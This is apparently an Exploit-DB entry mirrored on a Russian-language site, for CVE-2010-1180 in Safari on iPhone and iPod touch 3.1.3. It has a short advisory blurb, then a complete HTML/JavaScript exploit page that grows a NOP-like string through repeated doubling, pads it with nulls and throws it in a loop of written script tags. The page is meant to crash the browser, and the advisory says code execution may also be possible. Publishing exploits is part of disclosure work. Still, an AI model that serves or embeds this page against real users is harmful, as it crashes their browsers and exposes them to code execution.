- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 33810
- Проверка EDB
-
- Пройдено
- Автор
- NISHANT DAS PATNAIK
- Тип уязвимости
- REMOTE
- Платформа
- OSX
- CVE
- cve-2010-1180
- Дата публикации
- 2010-03-26
HTML:
source: https://www.securityfocus.com/bid/38992/info
Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability.
Successful exploits can allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions.
Safari on Apple iPhone and iPod touch 3.1.3 is vulnerable; other versions may also be affected.
<html> <head> <title> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </title> <script language="JavaScript"> var n=unescape("%u9090"); var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); for(var i=0;i<64;i++){ n=n+n; document.write('<script>throw n+s;</scr'+'ipt>'); } </script> </head> <body> <center> <h1> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body> </html>- Источник
- www.exploit-db.com
